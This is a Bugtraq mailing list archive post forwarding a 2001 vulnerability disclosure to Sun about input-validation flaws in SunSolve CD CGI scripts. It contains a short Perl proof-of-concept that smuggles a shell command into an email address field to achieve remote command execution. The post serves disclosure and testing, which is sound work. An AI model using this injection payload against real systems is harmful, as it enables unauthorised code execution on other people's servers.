Home page logo
/

bugtraq logo Bugtraq mailing list archives

SunSolve CD cgi scripts...
From: Fyodor <fyarochkin () trusecure com>
Date: Mon, 11 Mar 2002 12:46:06 +0700

Sun never responded to this mail so I guess they don't consider the bug
too be serious ... could be worth mentioning though.

----- Forwarded message from Fyodor <fyodor () relaygroup com> -----
Date: Sat, 16 Jun 2001 23:24:45 +0700
From: Fyodor <fyodor () relaygroup com>
To: security-alert () sun com
Subject: SunSolve CD security problems..

Hey folks, while playing with Sunsolve CD cgi scripts we found quite a
few user input validation problems which may pose security risks (remote
code execution).  Here's a perl script to test it quickly:

#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Request::Common qw(POST);
ua = new LWP::UserAgent;
$ua->agent("Scrapers");
my $req = POST  'http://sunsolveCD.box.com:8383/cd-cgi/sscd_suncourier.pl&apos;,
[
step =>  "submit" ,
emailaddr => "foo\ () bar com| id > /tmp/foo|"];
$res = $ua->request($req);
print $res->as_string;
print "code", $res->code, "\n";

cheers,